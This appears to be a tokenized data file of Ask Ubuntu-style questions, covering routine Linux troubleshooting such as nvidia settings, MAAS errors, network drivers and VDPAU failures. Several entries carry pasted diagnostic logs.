419017	after installing elementary os switchboard does n't have several plugs	i installed ubuntu 13.10 ( luna did n't recognize my wifi nor my ethernet ) and then installed pantheon desktop on top , i 'm very happy with it ... but my switchboard have just a few settings ... anybody knows how to add the missing ones ? ? ? most important is the displays , sound , drivers , network and mouse . here 's how my switchboard looks at the moment . hope anyone have at least the names of the plugs to install them . ( i do n't want to go back to unity just to switch a preference , or reallocate the displays position ) .
419019	nvidia-settings powermizer performance-mode on 12.04.4 64-bit	whenever i try to set the performance mode of my nvidia 525m gpu from adaptive to performance , it actually works , but only until i reboot my pc . after a reboot/relog i have to do it all over again via nvidia-settings . what is the official/safest way to make that change permanent ? why does n't nvidia-settings save the performance mode it has been set to ? is it a bug ? i am using the official nvidia 331 drivers provided by ubuntu 12.04.4 64-bit lts . thanks !
419020	how do i write eps and postscript programs ?	i am trying to write eps scripts . % ! 100 100 moveto /symbol 12 selectfont ( p ) show /times-roman 12 selectfont ( is less than 4 ) show i suspect that beginning the script with % ! is not correct , or sufficient . unfortunately , i can not find recent documentation , so i am unsure what eps scripts begin with .
419025	broadcasting from 2014 , imac g5 powerpc	i´ve got this imac g5 powerpc 2ghz & 2gb sdram and i got it for free ! i´m not an fan of apple but i thought that the specs were pretty nice for emulating snes gba and psx , however there are no descent one´s for the powerpc or at least not in the way i want them to work , like no fullscreen support or joystick support . i tried everything like emulator enhancer and controllermate and all that stuff . my question is , will i get more software possibilities if i put ubuntu on the mac ? like for instance , pcsx reloaded or epsxe , wich are intel and linux based ? ( the only one for powerpc is pcsx and it´s kinda crappy ) i´ve read the q & a about the whole matter but it still doesnt make things clear for me . is linux software bound to the processor type ? with kind regards , w.leeijen
419027	simply need to copy program file notepad.exe from the \windows to the \tools directory using command prompt	attempting to copy program file notepad.exe from the \windows to the \tools directory using command prompt . trying to complete simple tasks using command prompt , but still unable to grasp . have not found a set of instructions that clicks for me , very new to `` computing ''
419030	maas add virtual node - 'namedtuple_as_object ' error	i have a kvm-based virtual machine up and running on a server that 's also running maas . i 'm following the instructions here : http : //maas.ubuntu.com/docs/nodes.html # virtual-machine-nodes to add the vm to maas , so i 've added in the relevant fields ( address , power id & mac address ) i get the following 500 error : unable to create node : __init__ ( ) got an unexpected keyword argument 'namedtuple_as_object' the stack trace from /var/log/maas/maas.log is : error 2014-02-10 17:20:55,312 maasserver # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # exception : __init__ ( ) got an unexpected keyword argument 'namedtuple_as_object ' # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # error 2014-02-10 17:20:55,313 maasserver traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/django/core/handlers/base.py '' , line 115 , in get_response response = callback ( request , *callback_args , **callback_kwargs ) file `` /usr/lib/python2.7/dist-packages/django/views/decorators/vary.py '' , line 19 , in inner_func response = func ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/piston/resource.py '' , line 201 , in __call__ else : stream = srl.render ( request ) file `` /usr/lib/python2.7/dist-packages/piston/emitters.py '' , line 391 , in render seria = simplejson.dumps ( self.construct ( ) , cls=datetimeawarejsonencoder , ensure_ascii=false , indent=4 ) file `` /usr/lib/python2.7/dist-packages/simplejson/__init__.py '' , line 296 , in dumps **kw ) .encode ( obj ) typeerror : __init__ ( ) got an unexpected keyword argument 'namedtuple_as_object' i 'm not a python person , so not sure what 's going on in the above , but i have found this bug report : https : //bugs.launchpad.net/ubuntu/+source/python-django-piston/+bug/1184871 mentioning python , django & piston , all of which appear in the above stack trace . do i need to update one of the above packages ? sudo apt-get update says everything 's fine . running ubuntu-1204-precise-64-minimal on the metal itself .
419032	how can i improve my remote computer visualization ?	here is the thing guys : i enabled my gnome desktop sharing 3.4.2 on my ubuntu 12.04 lts and installed the vnc viewer software on my windows 7 desktop . i can actually access the ubuntu remotely , but i kind of need to select part of the screen with the mouse to refresh it . when i open any application , the window does not appear . i need to search for it with the cursor or even select part of the screen for it to appear . how can i improve it for better results ?
419038	installation : ca n't boot the ubuntu 12.04	i 'm trying to install ubuntu 12.04 on my laptop . i downloaded the .iso file and burned it to dvd , then i restart the system and select boot from dvd . now , there is just a black screen that a prompter is above the screen at the left side and i can not write anything . after about 15 minutes my system automatically shut down . how can i solve this ?
419039	how can i obtain the default configuration files of apache2 ?	i need to obtain the default configuration files of a fresh , vanilla apache2 . is there any way or place to obtain them ? any help is appreciated . note : other than the objective of this similar question i do not want to mess with the current existing apache2 installation in any way , shape , or form . i just want to learn the content of the default configuration files in order to compare them to the current configuration .
419041	which vm host application should i use	i 'm a ms admin trying to migrate to the linux world . i have setup a physical ubuntu server for learning and i was wondering which vm application should i use to run multiple server on my box ? i so that there is xen virtual box ? can anyone give a recommendation . please note that i do n't have a gui on my box since i 'm trying to do everything using the shell . thanks in advance ,
419042	how do i register as a ubuntu developer ?	i want to contribute as a ubuntu developer , and help out ubuntu in any way i can , but do n't really know where to register as a ubuntu developer , or what the requirements/steps for being an ubuntu developer are . how would i register to become a ubuntu developer ? also , when i have registered myself , how do i upload packages ? related : expansion of valve free games offer to ubuntu developers
419043	how to play soma.fm on google chrome with ubuntu 12.10	how would i make my chrome work in order to reproduce soma.fm ? when i visit : http : //somafm.com/play/lush instead of starting playing on chrome , i get a download of a pls file , which when trying to open it with rythmbox it does n't do anything . what am i missing here ?
419045	update xfce4-mailwatch from the command-line ?	is it possible to run a command in the console and trigger an update event for xfce4-mailwatch ? i am looking for the command-line equivalent of right-click and then update now . using xfce 4.12 and xfce4-mailwatch 1.2.0 .
419051	how to register an irc user on freenode ?	i was following this link here http : //freenode.net/faq.shtml # nicksetup but i ca n't understand a thing ! ! where do i input these commands ? in a terminal maybe ? ... but i want to use empathy as my messenger . is there something i do n't understand ? it 's clear that i 'm a real beginner so plz give me a step-by-step explanation and instructions . thanks in advance : d
419052	why is almost all of the 3 gb ram on my hp g62 laptop always used ?	i am using ubuntu 13.10 on a computer with 3072 mb ram and 20 gb swap . it is an hp g62 laptop which overheats pretty regularly . when i type free -mt in the terminal the output is : free -mt total used free shared buffers cached mem : 2873 2741 132 0 9 1084 -/+ buffers/cache : 1648 1225 swap : 19529 42 19487 total : 22403 2784 19619 note the free memory : 132 mb ! ! the maximum free memory i have observed is 750 mb directly after startup . whats happening ? ? ? also note the temperatures : sensors acpitz-virtual-0 adapter : virtual device temp1 : +78.0°c ( crit = +99.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +75.0°c ( high = +80.0°c , crit = +90.0°c ) core 2 : +72.0°c ( high = +80.0°c , crit = +90.0°c )
419053	how can i create shot down short cut on keyboard	question is simple how can i create shot down short cut on keyboard so when i press that buttons computer will shot down
419057	how can i upgrade from 12.10 to 13.10 via terminal using usb rather than from internet ?	while upgrading from 12.10 to 13.10 i was unable to select the upgrade option as follow , the same happened while i was trying to upgrading from 12.10 to 13.04 booting from usb presently i have a dial up connection and it 's too slow to upgrade via internet . so how can i use terminal to upgrade ubuntu via iso image of 13.10 . i do n't want to make a fresh installation because i do n't want to loose the packages i have .
419061	neither wired nor wireless in 12.04 on my lenovo z710	i just got this lenovo z710 for christmas and decided to remove the preinstalled windows 8 and install ubuntu 12.04 instead . however , i ca n't connect to any networks , wired nor wireless . i 've been reading up on my issue for weeks now and have n't found a working solution . i deleted all of my partitions last night and did a fresh install so hopefully i can work through this more easily . first thing i 've tried is : iwconfig which outputs : eth0 no wireless extensions lo no wireless extensions network card is a broadcom bcm43142 pc-id : [ 14e4:4365 ] rawberry @ rawberry-pc : ~/desktop/test $ lspci -vnn -d 14e4 : 01:00.0 network controller [ 0280 ] : broadcom corporation bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 ) subsystem : lenovo device [ 17aa:0611 ] flags : bus master , fast devsel , latency 0 , irq 17 memory at b0500000 ( 64-bit , non-prefetchable ) [ size=32k ] capabilities : < access denied > kernel driver in use : bcma-pci-bridge maybe some of this might help , i 'm still very new to linux so i 'm not sure what exactly this all means ... rawberry @ rawberrypc : ~ $ ifconfig eth0 link encap : ethernet hwaddr 0c:54 : a5:14:0b : ce inet6 addr : fe80 : :e54 : a5ff : fe14 : bce/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:331 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:73757 ( 73.7 kb ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:432 errors:0 dropped:0 overruns:0 frame:0 tx packets:432 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:34832 ( 34.8 kb ) tx bytes:34832 ( 34.8 kb ) rawberry @ rawberrypc : ~ $ sudo lshw -c network [ sudo ] password for rawberry : *-network unclaimed description : network controller product : broadcom corporation vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : latency=0 resources : memory : b0500000-b0507fff *-network description : ethernet interface product : atheros communications inc. vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 10 serial : 0c:54 : a5:14:0b : ce size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx driverversion=1.2.3 duplex=full firmware=n/a latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:18 memory : b0400000-b043ffff ioport:3000 ( size=128 ) any insight on my issue would be immensely appreciated , thanks !
419064	vdpauinfo : display : :0.0 screen : 0 error creating vdpau device : 1	new to this community . i hope that someone can help me with the below . i am at the point that i need to get vdpau to work to offload the cpu . no luck . last week my new gt610 nvidia card arrived - i had an ever so small hope that my current gt220 had a fault - installed it , and i still can not get vdpau to work . hence the gt220 is back in its position . what i mean is that after installing vdpauinfo the command : ~ $ vdpauinfo gives : display : :0.0 screen : 0 error creating vdpau device : 1 the motherboard is a gigabyte h55m-ud2h with on-board video controller and hdmi connector which i have disabled in the bios using the peg setting . ( according to the bios this would mean that it will select an external card over the on-board one ) . i installed ubuntu 13.04 since i had that on dvd , and downloaded and applied all the updates that came through . checking the video driver it indicated nouveau - which is `` as expected '' . upon the prompt to move to 13.10 i did so . i then used the `` settings '' option right top corner to install the nvidia drivers - i believe i picked the top one which should include the vdpau capbility . after that finished i stopped the x-server , opened a terminal session and generated a new xconf file and then tried to start the x-server again . this failed and it required a hard reboot . machine came back-up . i installed vdpauinfo using apt-get . then i executed `` vdpauinfo '' with the result as listed above.error creating vdpau device : 1 '' i have tried this numerous times over the last releases , probably as far back as 10.10 , and it never worked . i have trawled the web pages and followed clues and advice to no avail , this is the last piece of the puzzle to have my ubuntu based mediacentre which works like a dream apart from this bit . any help in resolving this or arriving at the point why this can not work for me is much appreciated . snippet from sudo lshw output : test-iv-medcntr description : desktop computer product : h55m-ud2h ( ) vendor : gigabyte technology co. , ltd. width : 64 bits capabilities : smbios-2.4 dmi-2.4 vsyscall32 configuration : boot=normal chassis=desktop uuid=00000000-0000-0000-0000-1c6f65825e1d *-core description : motherboard product : h55m-ud2h vendor : gigabyte technology co. , ltd. physical id : 0 version : x.x *-firmware description : bios vendor : award software international , inc. physical id : 0 version : f11 date : 08/20/2010 size : 128kib capacity : 8128kib capabilities : pci pnp upgrade shadowing cdboot bootselect edd int13floppy360 int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer int10video acpi usb ls120boot zipboot biosbootspecification *-cpu description : cpu product : intel ( r ) pentium ( r ) cpu g6950 @ 2.80ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : intel ( r ) pentium ( r ) cpu slot : socket 1156 size : 1197mhz capacity : 4ghz width : 64 bits clock : 133mhz capabilities : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp x86-64 constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm popcnt lahf_lm arat dtherm tpr_shadow vnmi flexpriority ept vpid cpufreq *-cache:0 *** [ data removed ] *** *-cache:1 *** [ data removed ] *** *-memory *** [ data removed ] *** *-bank:0 *** [ data removed ] *** *-bank:1 *** [ data removed ] *** *-bank:2 *** [ data removed ] *** *-bank:3 *** [ data removed ] *** *-pci:0 description : host bridge product : core processor dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 12 width : 32 bits clock : 33mhz *-pci:0 description : pci bridge product : core processor pci express x16 root port vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 12 width : 32 bits clock : 33mhz capabilities : pci pm msi pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport : b000 ( size=4096 ) memory : f9000000-faffffff ioport : d0000000 ( size=536870912 ) *-display description : vga compatible controller product : gt216 [ geforce gt 220 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : f9000000-f9ffffff memory : d0000000-dfffffff memory : ee000000-efffffff ioport : bf00 ( size=128 ) memory : e0000000-e007ffff *-multimedia description : audio device product : high definition audio controller vendor : nvidia corporation physical id : 0.1 bus info : pci @ 0000:01:00.1 version : a1 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:16 memory : faffc000-faffffff *** [ data removed ] *** for completeness i also include snippets from the `` xorg.0.log '' snippets from xorg.0.log [ 16.220 ] x.org x server 1.14.5 release date : 2013-12-12 [ 16.220 ] x protocol version 11 , revision 0 [ 16.220 ] build operating system : linux 3.2.0-37-generic x86_64 ubuntu [ 16.220 ] current operating system : linux test-iv-medcntr 3.11.0-15-generic # 25-ubuntu smp thu jan 30 17:22:01 utc 2014 x86_64 [ 16.220 ] kernel command line : boot_image=/boot/vmlinuz-3.11.0-15-generic root=uuid=32995062-eaef-4392-a77a-3fcf80fa543c ro quiet splash [ 16.220 ] build date : 17 december 2013 10:06:15am [ 16.220 ] xorg-server 2:1.14.5-1ubuntu2~saucy1 ( for technical support please see http : //www.ubuntu.com/support ) [ 16.220 ] current version of pixman : 0.30.2 [ 16.220 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 16.220 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 16.220 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : sun feb 9 13:27:51 2014 [ 16.220 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 16.220 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 16.241 ] ( == ) serverlayout `` layout0 '' [ 16.241 ] ( ** ) | -- > screen `` screen0 '' ( 0 ) [ 16.241 ] ( ** ) | | -- > monitor `` monitor0 '' [ 16.241 ] ( ** ) | | -- > device `` device0 '' [ 16.241 ] ( ** ) | -- > input device `` keyboard0 '' [ 16.241 ] ( ** ) | -- > input device `` mouse0 '' [ 16.241 ] ( == ) automatically adding devices [ 16.241 ] ( == ) automatically enabling devices [ 16.241 ] ( == ) automatically adding gpu devices [ 16.241 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 16.241 ] entry deleted from font path . [ 16.241 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 16.241 ] entry deleted from font path . [ 16.241 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 16.241 ] entry deleted from font path . [ 16.241 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 16.241 ] entry deleted from font path . [ 16.241 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 16.241 ] entry deleted from font path . [ 16.241 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 16.241 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 16.241 ] ( ww ) hotplugging is on , devices using drivers 'kbd ' , 'mouse ' or 'vmmouse ' will be disabled . [ 16.241 ] ( ww ) disabling keyboard0 [ 16.241 ] ( ww ) disabling mouse0 [ 16.241 ] ( ii ) loader magic : 0x7f131dcd7d20 [ 16.241 ] ( ii ) module abi versions : [ 16.241 ] x.org ansi c emulation : 0.4 [ 16.241 ] x.org video driver : 14.1 [ 16.241 ] x.org xinput driver : 19.1 [ 16.241 ] x.org server extension : 7.0 [ 16.243 ] ( -- ) pci : * ( 0:1:0:0 ) 10de:0a20:0000:0000 rev 162 , mem @ 0xf9000000/16777216 , 0xd0000000/268435456 , 0xee000000/33554432 , i/o @ 0x0000bf00/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 16.243 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 16.243 ] initializing built-in extension generic event extension [ 16.243 ] initializing built-in extension shape [ 16.243 ] initializing built-in extension mit-shm [ 16.243 ] initializing built-in extension xinputextension [ 16.243 ] initializing built-in extension xtest [ 16.243 ] initializing built-in extension big-requests [ 16.243 ] initializing built-in extension sync [ 16.243 ] initializing built-in extension xkeyboard [ 16.243 ] initializing built-in extension xc-misc [ 16.243 ] initializing built-in extension security [ 16.243 ] initializing built-in extension xinerama [ 16.243 ] initializing built-in extension xfixes [ 16.243 ] initializing built-in extension render [ 16.243 ] initializing built-in extension randr [ 16.243 ] initializing built-in extension composite [ 16.243 ] initializing built-in extension damage [ 16.243 ] initializing built-in extension mit-screen-saver [ 16.243 ] initializing built-in extension double-buffer [ 16.243 ] initializing built-in extension record [ 16.243 ] initializing built-in extension dpms [ 16.243 ] initializing built-in extension x-resource [ 16.243 ] initializing built-in extension xvideo [ 16.243 ] initializing built-in extension xvideo-motioncompensation [ 16.243 ] initializing built-in extension selinux [ 16.243 ] initializing built-in extension xfree86-vidmodeextension [ 16.243 ] initializing built-in extension xfree86-dga [ 16.243 ] initializing built-in extension xfree86-dri [ 16.243 ] initializing built-in extension dri2 [ 16.243 ] ( ii ) `` glx '' will be loaded by default . [ 16.243 ] ( ww ) `` xmir '' is not to be loaded by default . skipping . [ 16.243 ] ( ii ) loadmodule : `` dri2 '' [ 16.243 ] ( ii ) module `` dri2 '' already built-in [ 16.243 ] ( ii ) loadmodule : `` glamoregl '' [ 16.275 ] ( ii ) loading /usr/lib/xorg/modules/libglamoregl.so [ 17.365 ] ( ii ) module glamoregl : vendor= '' x.org foundation '' [ 17.365 ] compiled for 1.14.3 , module version = 0.5.1 [ 17.365 ] abi class : x.org ansi c emulation , version 0.4 [ 17.365 ] ( ii ) loadmodule : `` glx '' [ 17.365 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/libglx.so [ 17.487 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 17.487 ] compiled for 4.0.2 , module version = 1.0.0 [ 17.487 ] module class : x.org server extension [ 17.487 ] ( ii ) nvidia glx module 304.88 wed mar 27 14:46:57 pdt 2013 [ 17.487 ] loading extension glx [ 17.487 ] ( ii ) loadmodule : `` nvidia '' [ 17.487 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 17.558 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 17.558 ] compiled for 4.0.2 , module version = 1.0.0 [ 17.558 ] module class : x.org video driver [ 17.565 ] ( ii ) nvidia dlloader x driver 304.88 wed mar 27 14:28:14 pdt 2013 [ 17.565 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 17.571 ] ( ++ ) using vt number 7 [ 17.573 ] ( ii ) loading sub module `` fb '' [ 17.573 ] ( ii ) loadmodule : `` fb '' [ 17.579 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 17.580 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 17.580 ] compiled for 1.14.5 , module version = 1.0.0 [ 17.580 ] abi class : x.org ansi c emulation , version 0.4 [ 17.580 ] ( ii ) loading sub module `` wfb '' [ 17.580 ] ( ii ) loadmodule : `` wfb '' [ 17.580 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 17.588 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 17.588 ] compiled for 1.14.5 , module version = 1.0.0 [ 17.588 ] abi class : x.org ansi c emulation , version 0.4 [ 17.588 ] ( ii ) loading sub module `` ramdac '' [ 17.588 ] ( ii ) loadmodule : `` ramdac '' [ 17.588 ] ( ii ) module `` ramdac '' already built-in [ 17.598 ] ( ** ) nvidia ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 17.598 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 17.598 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 17.598 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 17.598 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 18.544 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung ( dfp-1 ) ) does not support nvidia 3d vision [ 18.544 ] ( ii ) nvidia ( gpu-0 ) : stereo . [ 18.546 ] ( ii ) nvidia ( 0 ) : nvidia gpu geforce gt 220 ( gt216 ) at pci:1:0:0 ( gpu-0 ) [ 18.546 ] ( -- ) nvidia ( 0 ) : memory : 1048576 kbytes [ 18.546 ] ( -- ) nvidia ( 0 ) : videobios : 70.16.27.00.02 [ 18.546 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 18.546 ] ( -- ) nvidia ( 0 ) : interlaced video modes are supported on this gpu [ 18.548 ] ( -- ) nvidia ( 0 ) : valid display device ( s ) on geforce gt 220 at pci:1:0:0 [ 18.548 ] ( -- ) nvidia ( 0 ) : crt-0 [ 18.548 ] ( -- ) nvidia ( 0 ) : crt-1 [ 18.548 ] ( -- ) nvidia ( 0 ) : dfp-0 [ 18.548 ] ( -- ) nvidia ( 0 ) : samsung ( dfp-1 ) ( connected ) [ 18.548 ] ( -- ) nvidia ( 0 ) : crt-0 : 400.0 mhz maximum pixel clock [ 18.548 ] ( -- ) nvidia ( 0 ) : crt-1 : 400.0 mhz maximum pixel clock [ 18.548 ] ( -- ) nvidia ( 0 ) : dfp-0 : 330.0 mhz maximum pixel clock [ 18.548 ] ( -- ) nvidia ( 0 ) : dfp-0 : internal single link tmds [ 18.548 ] ( -- ) nvidia ( 0 ) : samsung ( dfp-1 ) : 165.0 mhz maximum pixel clock [ 18.548 ] ( -- ) nvidia ( 0 ) : samsung ( dfp-1 ) : internal single link tmds [ 18.548 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 18.548 ] ( ** ) nvidia ( 0 ) : device samsung ( dfp-1 ) ( using edid frequencies has been [ 18.548 ] ( ** ) nvidia ( 0 ) : enabled on all display devices . ) [ 18.555 ] ( == ) nvidia ( 0 ) : [ 18.555 ] ( == ) nvidia ( 0 ) : no modes were requested ; the default mode `` nvidia-auto-select '' [ 18.555 ] ( == ) nvidia ( 0 ) : will be used as the requested mode . [ 18.555 ] ( == ) nvidia ( 0 ) : [ 18.555 ] ( ii ) nvidia ( 0 ) : validated metamodes : [ 18.555 ] ( ii ) nvidia ( 0 ) : `` dfp-1 : nvidia-auto-select '' [ 18.555 ] ( ii ) nvidia ( 0 ) : virtual screen size determined to be 1920 x 1080 [ 18.581 ] ( -- ) nvidia ( 0 ) : dpi set to ( 304 , 304 ) ; computed from `` useediddpi '' x config [ 18.581 ] ( -- ) nvidia ( 0 ) : option [ 18.581 ] ( -- ) depth 24 pixmap format is 32 bpp [ 18.581 ] ( ii ) nvidia : using 768.00 mb of virtual memory for indirect memory access . [ 18.585 ] ( ii ) nvidia ( 0 ) : setting mode `` dfp-1 : nvidia-auto-select '' [ 18.622 ] loading extension nv-glx [ 18.650 ] ( == ) nvidia ( 0 ) : disabling shared memory pixmaps [ 18.650 ] ( == ) nvidia ( 0 ) : backing store disabled [ 18.650 ] ( == ) nvidia ( 0 ) : silken mouse enabled [ 18.651 ] ( ** ) nvidia ( 0 ) : dpms enabled [ 18.660 ] loading extension nv-control [ 18.660 ] loading extension xinerama [ 18.660 ] ( ii ) loading sub module `` dri2 '' [ 18.660 ] ( ii ) loadmodule : `` dri2 '' [ 18.660 ] ( ii ) module `` dri2 '' already built-in [ 18.660 ] ( ii ) nvidia ( 0 ) : [ dri2 ] setup complete [ 18.660 ] ( ii ) nvidia ( 0 ) : [ dri2 ] vdpau driver : nvidia [ 18.660 ] ( -- ) randr disabled [ 18.664 ] ( ii ) selinux : disabled on system [ 18.664 ] ( ii ) initializing extension glx [ 18.696 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm *** [ data removed ] *** [ 18.705 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 7 ) [ 18.705 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 18.705 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 18.705 ] ( ** ) option `` xkb_layout '' `` gb '' [ 18.706 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=9 ( /dev/input/event13 ) [ 18.706 ] ( ii ) no input driver specified , ignoring this device . [ 18.706 ] ( ii ) this device may have been added with another device file . [ 18.706 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=8 ( /dev/input/event14 ) [ 18.706 ] ( ii ) no input driver specified , ignoring this device . [ 18.706 ] ( ii ) this device may have been added with another device file . [ 18.706 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=7 ( /dev/input/event15 ) [ 18.706 ] ( ii ) no input driver specified , ignoring this device . [ 18.706 ] ( ii ) this device may have been added with another device file . [ 18.706 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=3 ( /dev/input/event16 ) [ 18.706 ] ( ii ) no input driver specified , ignoring this device . [ 18.706 ] ( ii ) this device may have been added with another device file . [ 18.707 ] ( ii ) config/udev : adding input device pulse-eight usb-cec adapter ( /dev/input/event2 ) *** [ data removed ] *** [ 18.708 ] ( ii ) config/udev : adding input device logitech usb receiver ( /dev/input/mouse1 ) [ 18.709 ] ( ii ) no input driver specified , ignoring this device . [ 18.709 ] ( ii ) this device may have been added with another device file . [ 18.709 ] ( ii ) config/udev : adding input device hda intel mid line ( /dev/input/event10 ) [ 18.709 ] ( ii ) no input driver specified , ignoring this device . [ 18.709 ] ( ii ) this device may have been added with another device file . [ 18.709 ] ( ii ) config/udev : adding input device hda intel mid front mic ( /dev/input/event11 ) [ 18.709 ] ( ii ) no input driver specified , ignoring this device . [ 18.709 ] ( ii ) this device may have been added with another device file . [ 18.709 ] ( ii ) config/udev : adding input device hda intel mid rear mic ( /dev/input/event12 ) [ 18.709 ] ( ii ) no input driver specified , ignoring this device . [ 18.709 ] ( ii ) this device may have been added with another device file . [ 18.709 ] ( ii ) config/udev : adding input device hda intel mid front headphone ( /dev/input/event5 ) [ 18.709 ] ( ii ) no input driver specified , ignoring this device . [ 18.709 ] ( ii ) this device may have been added with another device file . [ 18.709 ] ( ii ) config/udev : adding input device hda intel mid line out side ( /dev/input/event6 ) [ 18.709 ] ( ii ) no input driver specified , ignoring this device . [ 18.709 ] ( ii ) this device may have been added with another device file . [ 18.710 ] ( ii ) config/udev : adding input device hda intel mid line out clfe ( /dev/input/event7 ) [ 18.710 ] ( ii ) no input driver specified , ignoring this device . [ 18.710 ] ( ii ) this device may have been added with another device file . [ 18.710 ] ( ii ) config/udev : adding input device hda intel mid line out surround ( /dev/input/event8 ) [ 18.710 ] ( ii ) no input driver specified , ignoring this device . [ 18.710 ] ( ii ) this device may have been added with another device file . [ 18.710 ] ( ii ) config/udev : adding input device hda intel mid line out front ( /dev/input/event9 ) [ 18.710 ] ( ii ) no input driver specified , ignoring this device . [ 18.710 ] ( ii ) this device may have been added with another device file . [ 20.181 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung ( dfp-1 ) ) does not support nvidia 3d vision [ 20.181 ] ( ii ) nvidia ( gpu-0 ) : stereo . [ 20.181 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 20.181 ] ( ** ) nvidia ( 0 ) : device samsung ( dfp-1 ) ( using edid frequencies has been [ 20.181 ] ( ** ) nvidia ( 0 ) : enabled on all display devices . ) [ 21.743 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung ( dfp-1 ) ) does not support nvidia 3d vision [ 21.743 ] ( ii ) nvidia ( gpu-0 ) : stereo . [ 21.743 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 21.743 ] ( ** ) nvidia ( 0 ) : device samsung ( dfp-1 ) ( using edid frequencies has been [ 21.743 ] ( ** ) nvidia ( 0 ) : enabled on all display devices . ) [ 30.475 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung ( dfp-1 ) ) does not support nvidia 3d vision [ 30.475 ] ( ii ) nvidia ( gpu-0 ) : stereo . [ 30.475 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 30.475 ] ( ** ) nvidia ( 0 ) : device samsung ( dfp-1 